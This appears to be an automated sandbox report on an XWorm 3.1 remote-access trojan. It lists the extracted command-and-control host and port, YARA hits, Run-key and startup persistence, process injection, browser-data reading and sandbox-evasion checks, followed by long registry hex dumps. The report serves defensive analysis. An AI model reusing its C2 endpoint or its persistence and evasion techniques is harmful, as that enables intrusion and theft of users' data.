Analysis
-
max time kernel
1588s -
max time network
1590s -
platform
windows11-21h2_x64 -
resource
win11-20240214-en -
resource tags
arch:x64arch:x86image:win11-20240214-enlocale:en-usos:windows11-21h2-x64system -
submitted
11-04-2024 13:31
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
xworm
3.1
full-wet.at.ply.gg:38848
-
Install_directory
%AppData%
-
install_file
chrome.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2808-1885-0x00000000002A0000-0x00000000002B8000-memory.dmp family_xworm C:\Users\Admin\AppData\Roaming\svchost.exe family_xworm -
Blocklisted process makes network request 8 IoCs
Processes:
powershell.exepowershell.exeflow pid process 308 3376 powershell.exe 316 3376 powershell.exe 320 6700 powershell.exe 335 3376 powershell.exe 339 6700 powershell.exe 344 3376 powershell.exe 362 6700 powershell.exe 373 6700 powershell.exe -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Drops startup file 2 IoCs
Processes:
svchost.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe -
Executes dropped EXE 36 IoCs
Processes:
Command Reciever.exeUpdate.exeCommand Reciever.exeUpdate.exeXHVNC-Client.exeXWorm V3.1.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeb3ownddosser.exeb3ownddosser.exeb3ownddosser.exeb3ownddosser.exeb3ownddosser.exesvchost.exeCommand Reciever.exeUpdate.exeCommand Reciever.exeUpdate.exeXHVNC-Client.exesvchost.exeXHVNC-Client.exesvchost.exesvchost.exepid process 1908 Command Reciever.exe 3016 Update.exe 2132 Command Reciever.exe 4348 Update.exe 2840 XHVNC-Client.exe 1372 XWorm V3.1.exe 2808 svchost.exe 6312 svchost.exe 5712 svchost.exe 6952 svchost.exe 6568 svchost.exe 5500 svchost.exe 1536 svchost.exe 2728 svchost.exe 6800 svchost.exe 5352 svchost.exe 2088 svchost.exe 6712 svchost.exe 6272 svchost.exe 7008 svchost.exe 6800 svchost.exe 7000 b3ownddosser.exe 6180 b3ownddosser.exe 2728 b3ownddosser.exe 4928 b3ownddosser.exe 1920 b3ownddosser.exe 4260 svchost.exe 6544 Command Reciever.exe 4496 Update.exe 5588 Command Reciever.exe 6888 Update.exe 3508 XHVNC-Client.exe 4956 svchost.exe 6448 XHVNC-Client.exe 6064 svchost.exe 6664 svchost.exe -
Loads dropped DLL 11 IoCs
Processes:
Command Reciever.exeUpdate.exeXHVNC.exeCommand Reciever.exeUpdate.exeXHVNC.exeCommand Reciever.exeUpdate.exeCommand Reciever.exeUpdate.exeXHVNC.exepid process 1908 Command Reciever.exe 3016 Update.exe 2392 XHVNC.exe 2132 Command Reciever.exe 4348 Update.exe 6708 XHVNC.exe 6544 Command Reciever.exe 4496 Update.exe 5588 Command Reciever.exe 6888 Update.exe 1604 XHVNC.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral1/memory/2392-626-0x0000000006540000-0x0000000006764000-memory.dmp agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
b3ownddosser.exeb3ownddosser.exeb3ownddosser.exeb3ownddosser.exeb3ownddosser.exereg.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" b3ownddosser.exe Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" b3ownddosser.exe Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" b3ownddosser.exe Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" b3ownddosser.exe Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" b3ownddosser.exe Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLogger\\Update.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" svchost.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
explorer.exeXHVNC.exedescription ioc process File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: XHVNC.exe File opened (read-only) \??\F: XHVNC.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
Processes:
flow ioc 35 raw.githubusercontent.com 55 raw.githubusercontent.com 63 raw.githubusercontent.com 448 raw.githubusercontent.com 606 raw.githubusercontent.com 613 raw.githubusercontent.com 617 raw.githubusercontent.com 58 raw.githubusercontent.com 65 raw.githubusercontent.com 272 camo.githubusercontent.com 605 raw.githubusercontent.com 609 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 199 ip-api.com 602 ip-api.com 35 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
lodctr.exedescription ioc process File created C:\Windows\system32\perfc009.dat lodctr.exe File created C:\Windows\system32\perfh009.dat lodctr.exe -
Suspicious use of SetThreadContext 10 IoCs
Processes:
XHVNC-Client.exeXWorm.exeXWorm.exeb3ownddosser.exeb3ownddosser.exeb3ownddosser.exeb3ownddosser.exeb3ownddosser.exeXHVNC-Client.exeXHVNC-Client.exedescription pid process target process PID 2840 set thread context of 2952 2840 XHVNC-Client.exe cvtres.exe PID 5192 set thread context of 3540 5192 XWorm.exe AppLaunch.exe PID 7128 set thread context of 800 7128 XWorm.exe AppLaunch.exe PID 7000 set thread context of 4800 7000 b3ownddosser.exe cvtres.exe PID 6180 set thread context of 4856 6180 b3ownddosser.exe cvtres.exe PID 2728 set thread context of 5196 2728 b3ownddosser.exe cvtres.exe PID 4928 set thread context of 3288 4928 b3ownddosser.exe cvtres.exe PID 1920 set thread context of 6152 1920 b3ownddosser.exe cvtres.exe PID 3508 set thread context of 2776 3508 XHVNC-Client.exe cvtres.exe PID 6448 set thread context of 6300 6448 XHVNC-Client.exe cvtres.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 22 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exeUpdate.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid process 4876 timeout.exe 2384 timeout.exe 6364 timeout.exe 3704 timeout.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 3572 tasklist.exe 396 tasklist.exe 1212 tasklist.exe 896 tasklist.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
Processes:
msedge.exechrome.exechrome.exemsedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 10 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1040 taskkill.exe 6088 taskkill.exe 4956 taskkill.exe 5876 taskkill.exe 5928 taskkill.exe 5908 taskkill.exe 6532 taskkill.exe 4424 taskkill.exe 5888 taskkill.exe 5896 taskkill.exe -
Processes:
explorer.exeAcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" explorer.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
chrome.exechrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133573161416536741" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 64 IoCs
Processes:
XHVNC.exeXHVNC.exeexplorer.exeMiniSearchHost.exeexplorer.exeexplorer.exeexplorer.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" XHVNC.exe Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1" XHVNC.exe Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f80cb859f6720028040b29b5540cc05aab60000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0 XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239} XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 XHVNC.exe Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16 XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" XHVNC.exe Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000100000014000000494c200601000400280010001000ffffffff2110ffffffffffffffff424d3600000000000000360000002800000010000000400000000100200000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000